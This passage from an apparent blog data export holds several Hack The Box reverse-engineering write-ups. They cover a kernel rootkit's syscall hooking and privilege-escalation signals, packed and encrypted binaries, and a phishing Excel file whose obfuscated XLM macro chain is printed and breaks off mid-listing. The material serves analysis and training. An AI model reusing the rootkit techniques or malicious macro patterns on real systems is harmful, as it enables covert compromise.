12enc_d= d[k_s + iv_s:] 13 14c = AES.new(key, AES.MODE_CBC, iv) 15dec_d = c.decrypt(enc_d) 16 17with open(\u0026#34;re.bin\u0026#34;, \u0026#39;wb\u0026#39;) as f: 18 f.write(dec_d) 19 20print(\u0026#34;re.bin\\ndone\u0026#34;) 1$ python3 dec.py 2re.bin 3done 4 5$ cat re.bin 6\u0026lt;Wrong username and/or password$Enter a username: $Enter a password: |ThisIsAReallyReallySecureKeyButYouCanReadItFromSourceSoItSucks:Please Enter the secret Key: 4Nice here is the Flag:HTB{}Wrong Key▒SuP3rC00lFL4g�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information.�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information.�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information.�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information. we see HTB{}Wrong Key▒SuP3rC00lFL4g so flag is HTB{SuP3rC00lFL4g}\n","date":"January 28, 2026","externalUrl":null,"permalink":"/investigations/htb-bypass/","section":"","summary":"","title":"HTB-Bypass","type":"investigations"},{"content":" Difficulty: Easy OS: Linux Date: 2026-01-28 Description:\nStatic analysis on this program didn\u0026rsquo;t reveal much. There must be a better way to approach this\u0026hellip;\ninitial analysis # We\u0026rsquo;re given a 64-bit ELF binary with a .ko extension (Kernel Object - a Linux Kernel Module).\n1$ file diamorphine.ko 2diamorphine.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), 3BuildID[sha1]=e6a635e5bd8219ae93d2bc26574fff42dc4e1105, with debug_info, not stripped reversing with IDA # Since this is a Linux Kernel Module, there\u0026rsquo;s no standard main function. Instead, the entry point is the initialization function.\nThe module manipulates the cr0 register to grant the rootkit permission to write to read-only sections of memory where the system call table resides.\nIn the sys_call_table, the following system calls are hooked and replaced with malicious functions:\n- kill → hacked_kill\n- getdents → hacked_getdents\n- getdents64 → hacked_getdents64\nhacked_kill func (priv esc and stealth) # When analyzing the hacked_kill function, we see it checks for signal code 64:\n1else if ( (_DWORD)si == 64 ) 2{ 3 v9 = prepare_creds(pt_regs, a2, v2, di); 4 // ... [snip] ... The function calls prepare_creds(), which creates a new credential structure for the current process. The credential structure in Linux looks like this:\n1struct cred { 2 kuid_t uid; 3 kgid_t gid; 4 kuid_t euid; 5 kgid_t egid; 6 kuid_t suid; 7 kgid_t sgid; 8 kuid_t fsuid; 9 kgid_t fsgid; 10 // ... [snip] ... 11}; The rootkit then overwrites all credential values to 0 (root UID), granting the process root privileges:\n1// ... [snip] ... 2*(_QWORD *)(v9 + 4) = 0; 3*(_QWORD *)(v9 + 12) = 0; 4*(_QWORD *)(v9 + 20) = 0; 5*(_QWORD *)(v9 + 28) = 0; 6commit_creds(v9); 7return 0; The rootkit can hide itself from the module list by manipulating the doubly-linked list when receiving signal code 46:\n1if ( (_DWORD)si == 46 ) 2{ 3 if ( !module_hidden ) 4 { 5 prev = _this_module.list.prev; 6 next = _this_module.list.next; 7 v6 = 0; 8 next-\u0026gt;prev = prev; 9 module_previous = prev; 10 prev-\u0026gt;next = next; 11 // ... [snip] ... 12 module_hidden = 1; 13 return v6; 14 } It can also unhide itself\nhacked_getdents func # this function first calls the original getdents and creates a buffer containing a copy of the directory listing (linux_dirent struct).\nIt then searches for entries containing the string \u0026ldquo;psychosis\u0026rdquo; (represented as hex 0x69736F6863797370 + character 115):\n1if ( *(_QWORD *)(v12 + 18) != 0x69736F6863797370LL || 2 *((_BYTE *)buffer + v11 + 26) != 115 ) 3 // ... [snip] ... If found, the entry is removed from the buffer, hiding any files/directories with \u0026ldquo;psychosis\u0026rdquo; in their name from ls and similar tools.\nexploitation # With the rootkit analysis complete, I proceeded to exploit and remove it from the compromised system:\nescalate to root: kill -64 $$ unhide the module: kill -46 $$ remove the rootkit: rmmod diamorphine (found in /sys/module/) find hidden file: 1# find / -name \u0026#34;psychosis*\u0026#34; 2\u0026gt;/dev/null 2/opt/psychosis 3 4# cat /opt/psychosis/flag.txt 5HTB{N0w_Y0u_C4n_S33_m3_4nd_th3_r00tk1t_h4s_b33n_sUcc3ssfully_d3f34t3d!!} ","date":"January 28, 2026","externalUrl":null,"permalink":"/investigations/htb-cyberpsychosis/","section":"","summary":"","title":"HTB-Cyberpsychosis","type":"investigations"},{"content":"","date":"January 28, 2026","externalUrl":null,"permalink":"/tags/lkm/","section":"Tags","summary":"","title":"LKM","type":"tags"},{"content":"","date":"January 28, 2026","externalUrl":null,"permalink":"/tags/rootkit/","section":"Tags","summary":"","title":"Rootkit","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-26 Description:\nStatic-Analysis on this program didn\u0026rsquo;t reveal much. There must be a better way to approach this\u0026hellip;\nStatic Analysis # Отриманий файл - PE execiteble для Windows 64-bit\n1$ file * 2partialencryption.exe: PE32+ executable for MS Windows 6.00 (console), x86-64, 5 sections Packer # Містить невелику кількість imports, що вказують на пакуваня (VirtualAlloc VirtualProtect VirtualFree) та на anti-dynamic analysis:\n- IsDebuggerPresent - перевірка чи програма працює під дебагером - QueryPerformanceCounter та GetSystemTimeAsFileTime - можуть використовутися для вимирювання часу між інструкціями\n1VirtualAlloc 2VirtualProtect 3VirtualFree 4QueryPerformanceCounter 5GetCurrentProcessId 6GetCurrentThreadId 7GetSystemTimeAsFileTime 8InitializeSListHead 9RtlCaptureContext 10RtlLookupFunctionEntry 11RtlVirtualUnwind 12IsDebuggerPresent 13UnhandledExceptionFilter 14SetUnhandledExceptionFilter 15IsProcessorFeaturePresent 16GetModuleHandleW 17KERNEL32.dll Reversing # by static analysis i found that used aeskeygenassist та aesdeclast instructions. Це вказує на використання процесорних розширень Intel AES-NI для криптографічних операцій - aeskeygenassist used to assist in generating round keys on-the-fly\naesdeclast performs the final round of the decryption state Dynamic Analysis # just running # i tried run program\nC:\\Users\\f\\Desktop\u0026gt;partialencryption.exe aaaaaaaa Nope C:\\Users\\f\\Desktop\u0026gt;partialencryption.exe aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa No Running over x64dbg # I placed a breakpoint on the VirtualAlloc call to identify where data is being written in memory. I set a hardware breakpoint on that address, resumed execution, but only received a Nope message. This indicated that a check was failing before the program jumped to the decrypted data.\nI then executed the program with a longer input string (e.g., aaa...) to observe its behavior under those conditions.\nIn this case, the program began checking individual characters of the flag.\n1...[snip]... 2| mov rax,qword ptr ds:[rdx+rax] | 3| movsx eax,byte ptr ds:[rax+rcx] | 4| cmp eax,48 | 48:\u0026#39;H\u0026#39; 5...[snip]... 6| mov rax,qword ptr ds:[rdx+rax] | 7| movsx eax,byte ptr ds:[rax+rcx] | 8| cmp eax,54 | 54:\u0026#39;T\u0026#39; 9...[snip]... 10| mov rax,qword ptr ds:[rdx+rax] | 11| movsx eax,byte ptr ds:[rax+rcx] | 12| cmp eax,42 | 42:\u0026#39;B\u0026#39; 13...[snip]... 14| mov rax,qword ptr ds:[rdx+rax] | 15| movsx eax,byte ptr ds:[rax+rcx] | 16| cmp eax,7B | 7B:\u0026#39;{\u0026#39; 17...[snip]... 18| imul rcx,rcx,15 | rcx:putchar 19| mov rdx,qword ptr ss:[rsp+48] | rdx:exit 20| mov rax,qword ptr ds:[rdx+rax] | 21| movsx eax,byte ptr ds:[rax+rcx] | 22| cmp eax,7D | 7D:\u0026#39;}}\u0026#39; 23...[snip]... Continuing debugging, I found three identical blocks of code that handle decryption and execution:\n1| mov r8d,8000 | 2| xor edx,edx | 3| mov rcx,qword ptr ss:[rsp+30] | 4| call qword ptr ds:[\u0026lt;VirtualFree\u0026gt;] | 5| xor eax,eax | 6| cmp eax,1 | 7| je partialencryption.7FF62E0F149A | 8| mov edx,1E0 | ## size 480 bytes 9| lea rcx,qword ptr ds:[7FF62E0F42E0] | ## encryption data source 10| call partialencryption.7FF62E0F1050 | ## decrypting payload into memory 11...[snip]... 12| call qword ptr ss:[rsp+58] | ## jumps directly to the start of that new decrypted code By placing breakpoints on these dynamic call qword ptr ss:[rsp+??] instructions, we intercepted the decrypted logic for each stage.\ncall qword ptr ss:[rsp+58]:\n1...[snip]... 2| mov rax,qword ptr ds:[rdx+rax] | 3| movsx eax,byte ptr ds:[rax+rcx] | 4| cmp eax,57 | 57:\u0026#39;W\u0026#39; 5...[snip]... 6| cmp eax,33 | 33:\u0026#39;3\u0026#39; 7...[snip]... 8| cmp eax,33 | 33:\u0026#39;3\u0026#39; 9...[snip]... 10| cmp eax,52 | 52:\u0026#39;R\u0026#39; 11...[snip]... 12| cmp eax,52 | 52:\u0026#39;R\u0026#39; 13...[snip]... 14| cmp eax,5F | 5F:\u0026#39;_\u0026#39; By debugging the remaining two parts, I obtained the final flag: HTB{W3iRd_RUnT1m3_DEC}.\n","date":"January 26, 2026","externalUrl":null,"permalink":"/investigations/htb-partial_encryption/","section":"","summary":"","title":"HTB-Partial_Encryption","type":"investigations"},{"content":"","date":"January 26, 2026","externalUrl":null,"permalink":"/tags/packer/","section":"Tags","summary":"","title":"Packer","type":"tags"},{"content":"","date":"January 26, 2026","externalUrl":null,"permalink":"/tags/x64dbg/","section":"Tags","summary":"","title":"X64dbg","type":"tags"},{"content":" Difficulty: Easy OS: Linux Date: 2026-01-22 Description:\nMy implementation of authentication mechanisms in C turned out to be failures. But my implementation in Rust is unbreakable. Can you retrieve my password?\nInitial Analysis # Rauth це ELF binary під архітерутур x86-64.\n1$ file rauth 2rauth: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fc374b8206147fac9067599050989191b39eefcf, with debug_info, not stripped При запуску нас просять вести пароль.\n1$ ./rauth 2Welcome to secure login portal! 3Enter the password to access the system: 4aaaaaaaaaaa 5You entered a wrong password! При введені невірного пароля виводиться повідомлення \u0026ldquo;You entered a wrong password!\u0026rdquo;. Тому найпершою ідеєю в мене було відкрити цей файл в дизассемблері IDA та подивитися яка перевірка призводить до цієї гілки.\nDissasembling # Розгалуження виконання робить ці рядки.\nЙде перевірка чи bl = 0, якщо так то відбуєвать стрибок loc_6992 та виконується print(\u0026quot;You entered a wrong password!\u0026quot;) Debagging # Вирішив змінити хід виконання, змінивши в дебагері значення rbx\n1(gdb) b *0x55555540683e 2Breakpoint 2 at 0x55555540683e 3(gdb) c 4Continuing. 5Welcome to secure login portal! 6Breakpoint 2, 0x000055555540683e in rauth::main () 7(gdb) set $rbx = 1 8(gdb) c 9Continuing. 10Successfully Authenticated 11(gdb) \u0026#34;HTB{F4k3_f74g_4_t3s7ing}\u0026#34; 12[Inferior 1 (process 24204) exited normally] Бачимо що ми отримали fake flag.\nsalsa20 # Я помітив використання криптографічного алгоритму Salsa20.\n1(gdb) info func salsa 2All functions matching regular expression \u0026#34;salsa\u0026#34;: 3 4Non-debugging symbols: 50x00005555554056b0 salsa20::core::Core\u0026lt;R\u0026gt;::apply_keystream 60x0000555555405900 salsa20::core::Core\u0026lt;R\u0026gt;::new 70x00005555554059a0 salsa20::core::Core\u0026lt;R\u0026gt;::rounds 80x0000555555405d10 \u0026lt;salsa20::salsa::Salsa\u0026lt;R\u0026gt; as cipher::stream::StreamCipher\u0026gt;::try_apply_keystream salsa20::core::Core\u0026lt;R\u0026gt;::new - constructor that typically takes a 256-bit (32-byte) key and a 64-bit (8-byte) nonce (IV)\nsalsa20::core::Core\u0026lt;R\u0026gt;::apply_keystream -\nВирішви подивитися які аргументи передаються в Salsa20::new\n1(gdb) b salsa20::core::Core\u0026lt;R\u0026gt;::new 2Breakpoint 2 at 0x555555405900 3(gdb) b salsa20::core::Core\u0026lt;R\u0026gt;::apply_keystream 4Breakpoint 3 at 0x5555554056b0 5(gdb) start 6The program being debugged has been started already. 7Start it from the beginning? (y or n) y 8Temporary breakpoint 4 at 0x555555406bd0 9Starting program: /home/kali/Desktop/challanges/RAuth/rauth 10[Thread debugging using libthread_db enabled] 11Using host libthread_db library \u0026#34;/usr/lib/x86_64-linux-gnu/libthread_db.so.1\u0026#34;. 12 13Temporary breakpoint 4, 0x0000555555406bd0 in main () 14(gdb) c 15Continuing. 16Welcome to secure login portal! 17Enter the password to access the system: 18aaaaa 19 20Breakpoint 2, 0x0000555555405900 in salsa20::core::Core\u0026lt;R\u0026gt;::new () 21(gdb) i r 22rax 0x55555564fe20 93824993263136 23rbx 0x555555408530 93824990872880 24rcx 0x55555564fe20 93824993263136 25rdx 0x7fffffffdaa0 140737488345760 26rsi 0x7fffffffda70 140737488345712 27rdi 0x7fffffffd9e0 140737488345568 28rbp 0x1 0x1 29rsp 0x7fffffffd9d8 0x7fffffffd9d8 30r8 0x7ffff7e15ac0 140737352129216 31r9 0x30 48 32r10 0x1 1 33r11 0x0 0 34r12 0x0 0 35r13 0x555555439e28 93824991075880 36r14 0x555555649090 93824993235088 37r15 0x55555564fe20 93824993263136 38rip 0x555555405900 0x555555405900 \u0026lt;salsa20::core::Core\u0026lt;R\u0026gt;::new\u0026gt; 39eflags 0x202 [ IF ] 40cs 0x33 51 41ss 0x2b 43 42ds 0x0 0 43es 0x0 0 44fs 0x0 0 45gs 0x0 0 46fs_base 0x7ffff7f5d800 140737353472000 47gs_base 0x0 0 48(gdb) x/s $rdi 490x7fffffffd9e0: \u0026#34; \u0026#34; 50(gdb) x/s $rsi 510x7fffffffda70: \u0026#34;ef39f4f20e76e33bd25f4db338e81b10\\001\u0026#34; 52(gdb) x/s $rdx 530x7fffffffdaa0: \u0026#34;d4c270a3\u0026#34; значення в rsi це 32byte ключ, в rdx це nonce - key: ef39f4f20e76e33bd25f4db338e81b10\n- nonce: d4c270a3\nДалі потрібно дізнатися де лежать зашифровані дані. перед викликом функції salsa20::core::Core\u0026lt;R\u0026gt;::new я помітив як на стек кладеться 32 байтне значення з xmmword_39CC0 та xmmword_39CD0 1.rodata:0000000000039CC0 xmmword_39CC0 xmmword 0F331CBA656F5D958D5A829A3B15F0505h 2.rodata:0000000000039CD0 xmmword_39CD0 xmmword 0F91BAD626FB63EE372EC9DC9312A4324h Спроба розшифрування\n1$ python3 2Python 3.13.11 (main, Dec 8 2025, 11:43:54) [GCC 15.2.0] on linux 3Type \u0026#34;help\u0026#34;, \u0026#34;copyright\u0026#34;, \u0026#34;credits\u0026#34; or \u0026#34;license\u0026#34; for more information. 4\u0026gt;\u0026gt;\u0026gt; from Crypto.Cipher import Salsa20 5\u0026gt;\u0026gt;\u0026gt; c = \u0026#34;0505 5fb1 a329 a8d5 58d9 f556 a6cb 31f3 2443 2a31 c99d ec72 e33e b66f 62ad 1bf9\u0026#34; 6\u0026gt;\u0026gt;\u0026gt; Salsa20.new(key=b\u0026#34;ef39f4f20e76e33bd25f4db338e81b10\u0026#34;, nonce=b\u0026#34;d4c270a3\u0026#34;).decrypt(bytes.fromhex(c)) 7b\u0026#39;TheCrucialRustEngineering@2021;)\u0026#39; І при спробі автентифікуватися на хості з цим паролем, ми отримуємо прапор\n1$ nc 94.237.63.176 32734 2Welcome to secure login portal! 3Enter the password to access the system: 4TheCrucialRustEngineering@2021;) 5Successfully Authenticated 6Flag: \u0026#34;HTB{I_Kn0w_h0w_t0_5al54}\u0026#34; ","date":"January 22, 2026","externalUrl":null,"permalink":"/investigations/htb-rauth/","section":"","summary":"","title":"HTB-RAuth","type":"investigations"},{"content":"","date":"January 22, 2026","externalUrl":null,"permalink":"/tags/rust/","section":"Tags","summary":"","title":"Rust","type":"tags"},{"content":"","date":"January 22, 2026","externalUrl":null,"permalink":"/tags/rust-gdb/","section":"Tags","summary":"","title":"Rust-Gdb","type":"tags"},{"content":"","date":"January 22, 2026","externalUrl":null,"permalink":"/tags/salsa20/","section":"Tags","summary":"","title":"Salsa20","type":"tags"},{"content":"","date":"January 21, 2026","externalUrl":null,"permalink":"/tags/avr/","section":"Tags","summary":"","title":"Avr","type":"tags"},{"content":"","date":"January 21, 2026","externalUrl":null,"permalink":"/tags/ghidra/","section":"Tags","summary":"","title":"Ghidra","type":"tags"},{"content":"Description\nIn the cacophony of noise lies the potential for a clear message. (The flag format is HTB{SOME TEXT HERE}.) Difficulty: Easy OS: Linux Date: 2026-01-21 Initial Analysis # I identified the binary type to understand what I was dealing with\n1$ file Hubbub 2Hubbub: ELF 32-bit LSB executable, Atmel AVR 8-bit, version 1 (SYSV), statically linked, with debug_info, not stripped Its\u0026rsquo; an Atmel AVR 8-bit executable, commonly used in Arduino microcontrollers\nRunning strings on the binary revealed references to Arduino library functions like tone() and delay(). This immediately suggested the program generates audio output, possibly encoding a hidden message.\nReverse # I\u0026rsquo;m opened it in Ghidra and found a main logic in function (FUN_code_0002f4) i understood that \u0026hellip; and than \u0026hellip; Inside main, I observed a repetitive pattern of function calls. By correlating the assembly instructions with the strings found earlier, I identified two key functions:\nThe Pattern Emerges # tone (FUN_code_0001b5): generates sound at specific frequencies\ndelay (FUN_code_000098): creates pauses in execution\nLooking closely at the arguments passed to delay(), I noticed two distinct constants being loaded into registers: - 0x012c (300 ms)\n- 0x0158 (600 ms)\nGiven the audio context, i hypothesized this was Morse Code.\n- The shorter duration 0x2c represents a Dot (.)\n- The longer duration 0x58 (exactly double the short duration) represents a Dash (-)\nDecoding # I extracted the decompiled C code from Ghidra into a text file named dec.txt and wrote a Python script to parse it\n1with open(\u0026#34;dec.txt\u0026#34;, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: 2 lines = f.readlines() 3 4morse_code = \u0026#34;\u0026#34; 5 6for l in lines: 7 if \u0026#34;0x2c\u0026#34; in l: 8 morse_code += \u0026#34;.\u0026#34; 9 elif \u0026#34;0x58\u0026#34; in l: 10 morse_code += \u0026#34;-\u0026#34; 11 12 if \u0026#34;0xe8\u0026#34; in l: 13 morse_code += \u0026#34; \u0026#34; 14 elif \u0026#34;0xd0\u0026#34; in l: 15 morse_code += \u0026#34; / \u0026#34; 16 17print(morse_code) 18 19MORSE_dict = { 20 \u0026#39;..-.\u0026#39;: \u0026#39;F\u0026#39;, \u0026#39;-..-\u0026#39;: \u0026#39;X\u0026#39;, \u0026#39;.--.\u0026#39;: \u0026#39;P\u0026#39;, \u0026#39;-\u0026#39;: \u0026#39;T\u0026#39;, \u0026#39;..---\u0026#39;: \u0026#39;2\u0026#39;, 21 \u0026#39;....-\u0026#39;: \u0026#39;4\u0026#39;, \u0026#39;-----\u0026#39;: \u0026#39;0\u0026#39;, \u0026#39;--...\u0026#39;: \u0026#39;7\u0026#39;, \u0026#39;...-\u0026#39;: \u0026#39;V\u0026#39;, \u0026#39;-.-.\u0026#39;: \u0026#39;C\u0026#39;, 22 \u0026#39;.\u0026#39;: \u0026#39;E\u0026#39;, \u0026#39;.---\u0026#39;: \u0026#39;J\u0026#39;, \u0026#39;---\u0026#39;: \u0026#39;O\u0026#39;, \u0026#39;-.-\u0026#39;: \u0026#39;K\u0026#39;, \u0026#39;----.\u0026#39;: \u0026#39;9\u0026#39;, 23 \u0026#39;..\u0026#39;: \u0026#39;I\u0026#39;, \u0026#39;.-..\u0026#39;: \u0026#39;L\u0026#39;, \u0026#39;.....\u0026#39;: \u0026#39;5\u0026#39;, \u0026#39;...--\u0026#39;: \u0026#39;3\u0026#39;, \u0026#39;-.--\u0026#39;: \u0026#39;Y\u0026#39;, 24 \u0026#39;-....\u0026#39;: \u0026#39;6\u0026#39;, \u0026#39;.--\u0026#39;: \u0026#39;W\u0026#39;, \u0026#39;....\u0026#39;: \u0026#39;H\u0026#39;, \u0026#39;-.\u0026#39;: \u0026#39;N\u0026#39;, \u0026#39;.-.\u0026#39;: \u0026#39;R\u0026#39;, 25 \u0026#39;-...\u0026#39;: \u0026#39;B\u0026#39;, \u0026#39;---..\u0026#39;: \u0026#39;8\u0026#39;, \u0026#39;--..\u0026#39;: \u0026#39;Z\u0026#39;, \u0026#39;-..\u0026#39;: \u0026#39;D\u0026#39;, \u0026#39;--.-\u0026#39;: \u0026#39;Q\u0026#39;, 26 \u0026#39;--.\u0026#39;: \u0026#39;G\u0026#39;, \u0026#39;--\u0026#39;: \u0026#39;M\u0026#39;, \u0026#39;..-\u0026#39;: \u0026#39;U\u0026#39;, \u0026#39;.-\u0026#39;: \u0026#39;A\u0026#39;, \u0026#39;...\u0026#39;: \u0026#39;S\u0026#39;, \u0026#39;.----\u0026#39;: \u0026#39;1\u0026#39; 27} 28 29def morse_to_text(stri): 30 res = \u0026#34;\u0026#34; 31 stri = stri.split(\u0026#34; \u0026#34;) 32 33 for s in stri: 34 if s == \u0026#34;/\u0026#34;: 35 res += \u0026#34; \u0026#34; 36 else: 37 res += MORSE_dict[s] 38 return res 39 40print(morse_to_text(morse_code)) Running the script:\n1$ python3 dec.py 2.... - -... / .- / -. --- .. ... -.-- / -... ..- --.. --.. . .-. / -.-. --- -- -- .- -. -.. ... / .- - - . -. - .. --- -. 3HTB A NOISY BUZZER COMMANDS ATTENTION the flag:\n1HTB{A NOISY BUZZER COMMANDS ATTENTION} ","date":"January 21, 2026","externalUrl":null,"permalink":"/investigations/htb-hubbub/","section":"","summary":"","title":"HTB-Hubbub","type":"investigations"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/excel/","section":"Tags","summary":"","title":"Excel","type":"tags"},{"content":" Difficulty: Hard OS: Linux Date: 2026-01-20 Description: Another Phishing document. Dig in and see if you can find what it executes.\nTL;DR # Malicious Excel 97-2003 document containing obfuscated XLM (Excel 4.0) macros. Analysis involves identifying the file format, extracting embedded macros using oletools, deobfuscating concatenated formula chains, and reconstructing the complete malicious payload to extract the flag.\nInitial Analysis # I identified the file type to understand its structure. The provided file is an Excel 97-2003 document\n1$ file oBfsC4t10n2.xls 2oBfsC4t10n2.xls: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: 0xdf, Last Saved By: 0xdf, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Mar 23 15:19:10 2020, Last Saved Time/Date: Sat Apr 25 19:43:56 2020, Security: 0 oleid shows no VBA macros but confirms the presence of Excel 4.0 (XLM) macros\n1$ oleid oBfsC4t10n2.xls 2...[snip]... 3--------------------+--------------------+----------+-------------------------- 4VBA Macros |No |none |This file does not contain 5 | | |VBA macros. 6--------------------+--------------------+----------+-------------------------- 7XLM Macros |Yes |Medium |This file contains XLM 8 | | |macros. Use olevba to 9 | | |analyse them. 10--------------------+--------------------+----------+-------------------------- 11...[snip]... Analysis # Using olevba to extract and analyze the XLM macros:\n1\u0026#39; Sheet,Reference,Formula,Value 2\u0026#39; c1zB0vasN,D8,\u0026#34;IF(GET.WORKSPACE(42),CONCATENATE(E394,F1194,F549,E635,O697,U208,T458,M868,Z4,U777),CONCATENATE(F394,F1194,E549,O635,U697,D777))\u0026#34;,\u0026#34;\u0026#34; 3\u0026#39; c1zB0vasN,D9,GET.WORKSPACE(13),\u0026#34;\u0026#34; 4\u0026#39; c1zB0vasN,D10,GOTO(C1300),\u0026#34;\u0026#34; 5\u0026#39; c1zB0vasN,H60,\u0026#34;CONCATENATE(D187,P602,Y1087,L575)\u0026#34;,\u0026#34;\u0026#34; 6\u0026#39; c1zB0vasN,I180,\u0026#34;CONCATENATE(E615,W1026)\u0026#34;,\u0026#34;\u0026#34; 7\u0026#39; c1zB0vasN,D187,\u0026#34;CONCATENATE(K1036,D1095,Q603,B482)\u0026#34;,\u0026#34;\u0026#34; 8\u0026#39; c1zB0vasN,Q222,\u0026#34;IF(GET.WORKSPACE(19),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;rstegerg3\u0026#34;),CLOSE(TRUE))\u0026#34;,\u0026#34;\u0026#34; 9\u0026#39; c1zB0vasN,O347,\u0026#34;CONCATENATE(I1324,M11,L54,F80,Y144,X179,P383)\u0026#34;,\u0026#34;\u0026#34; 10\u0026#39; c1zB0vasN,K390,\u0026#34;CONCATENATE(R890,G625,D1023,O870)\u0026#34;,\u0026#34;\u0026#34; 11\u0026#39; c1zB0vasN,U410,\u0026#34;CONCATENATE(B781,I781)\u0026#34;,\u0026#34;\u0026#34; 12\u0026#39; c1zB0vasN,Y420,\u0026#34;CONCATENATE(B1193,F1204,W1216)\u0026#34;,\u0026#34;\u0026#34; 13\u0026#39; c1zB0vasN,D450,\u0026#34;CONCATENATE(T7,V202)\u0026#34;,\u0026#34;\u0026#34; 14\u0026#39; c1zB0vasN,D513,\u0026#34;CONCATENATE(Y841,L955,A1038,R1149,G1239)\u0026#34;,\u0026#34;\u0026#34; 15\u0026#39; c1zB0vasN,N545,\u0026#34;document.HIDE(\u0026#34;c1zB0vasNO\u0026#34;,TRUE)\u0026#34;,\u0026#34;\u0026#34; 16\u0026#39; c1zB0vasN,N546,GET.WORKSPACE(1),\u0026#34;\u0026#34; 17\u0026#39; c1zB0vasN,N547,\u0026#34;IF(ISNUMBER(SEARCH(\u0026#34;Windows\u0026#34;,N546)),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;agawf23f\u0026#34;),CLOSE(FALSE))\u0026#34;,\u0026#34;\u0026#34; 18\u0026#39; c1zB0vasN,L554,\u0026#34;CONCATENATE(D999,K1225)\u0026#34;,\u0026#34;\u0026#34; 19\u0026#39; c1zB0vasN,L575,\u0026#34;CONCATENATE(F1242,W428,R608)\u0026#34;,\u0026#34;\u0026#34; 20\u0026#39; c1zB0vasN,Q603,\u0026#34;CONCATENATE(Q1159,P1236,D1332,R27,W353,D434)\u0026#34;,\u0026#34;\u0026#34; 21\u0026#39; c1zB0vasN,E615,\u0026#34;CONCATENATE(D999,L1217,M1256,U1315)\u0026#34;,\u0026#34;\u0026#34; 22\u0026#39; c1zB0vasN,T698,\u0026#34;IF(OR(D9\u0026lt;700),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;Lsl23Us7a\u0026#34;))\u0026#34;,\u0026#34;\u0026#34; 23\u0026#39; c1zB0vasN,O752,\u0026#34;CONCATENATE(D8,D513)\u0026#34;,\u0026#34;\u0026#34; 24\u0026#39; c1zB0vasN,B781,\u0026#34;CONCATENATE(E1006,T1063,D874,P180)\u0026#34;,\u0026#34;\u0026#34; 25\u0026#39; c1zB0vasN,I781,\u0026#34;CONCATENATE(Y222,K1085,P765,I809,C877)\u0026#34;,\u0026#34;\u0026#34; 26\u0026#39; c1zB0vasN,D874,\u0026#34;CONCATENATE(E1164,U1191,V1285,N11,E94)\u0026#34;,\u0026#34;\u0026#34; 27\u0026#39; c1zB0vasN,R890,\u0026#34;CONCATENATE(J1273,U385,T673,R75,H865)\u0026#34;,\u0026#34;\u0026#34; 28\u0026#39; c1zB0vasN,C953,\u0026#34;CONCATENATE(B358,Q771,K834,K924,D1020,M1175,F94)\u0026#34;,\u0026#34;\u0026#34; 29\u0026#39; c1zB0vasN,D999,\u0026#34;CONCATENATE(X1224,P1281,U1293,G11,Q801)\u0026#34;,\u0026#34;\u0026#34; 30\u0026#39; c1zB0vasN,R999,\u0026#34;\u0026#34;,4.00000000000000000000 31\u0026#39; c1zB0vasN,Q1000,CONCATENATE(U410),\u0026#34;\u0026#34; 32\u0026#39; c1zB0vasN,D1023,\u0026#34;IF(ISNUMBER(SEARCH(\u0026#34;6.1\u0026#34;,N546)),CONCATENATE(Z699,L932,J1190,C574,J644,A718,E813),CONCATENATE(A699,E932,K1190,J574,A644,Z718,W813))\u0026#34;,\u0026#34;\u0026#34; 33\u0026#39; c1zB0vasN,D1024,GOTO(R1186),\u0026#34;\u0026#34; 34\u0026#39; c1zB0vasN,W1026,\u0026#34;CONCATENATE(B1334,B36,H461,G1019,U1036)\u0026#34;,\u0026#34;\u0026#34; 35\u0026#39; c1zB0vasN,S1032,\u0026#34;CONCATENATE(M15,T86,S187,V106,R58,P1318,C194,M440)\u0026#34;,\u0026#34;\u0026#34; 36\u0026#39; c1zB0vasN,S1035,\u0026#34;\u0026#34;,4.00000000000000000000 37\u0026#39; c1zB0vasN,C1040,\u0026#34;CONCATENATE(F1213,I1285,O347,X742)\u0026#34;,\u0026#34;\u0026#34; 38\u0026#39; c1zB0vasN,P1047,\u0026#34;CONCATENATE(H730,C801,K802,S1032,C297,B358)\u0026#34;,\u0026#34;\u0026#34; 39\u0026#39; c1zB0vasN,K1085,\u0026#34;CONCATENATE(G335,Q471,W570,F615,O686,V719)\u0026#34;,\u0026#34;\u0026#34; 40\u0026#39; c1zB0vasN,Y1087,\u0026#34;CONCATENATE(T645,M750,N1097,V551,Z960,B994)\u0026#34;,\u0026#34;\u0026#34; 41\u0026#39; c1zB0vasN,R1186,GET.WORKSPACE(1),\u0026#34;\u0026#34; 42\u0026#39; c1zB0vasN,R1187,\u0026#34;IF(NOT(ISNUMBER(SEARCH(\u0026#34;7.0\u0026#34;,R1186))),CLOSE(FALSE))\u0026#34;,\u0026#34;\u0026#34; 43\u0026#39; c1zB0vasN,R1188,\u0026#34;CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\u0026#34;,0)\u0026#34;,\u0026#34;\u0026#34; 44\u0026#39; c1zB0vasN,R1189,\u0026#34;CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\\CkkYKlI\u0026#34;,0)\u0026#34;,\u0026#34;\u0026#34; 45\u0026#39; c1zB0vasN,J1190,\u0026#34;CONCATENATE(T1000,W1063,O1107,K1131,D517)\u0026#34;,\u0026#34;\u0026#34; 46\u0026#39; 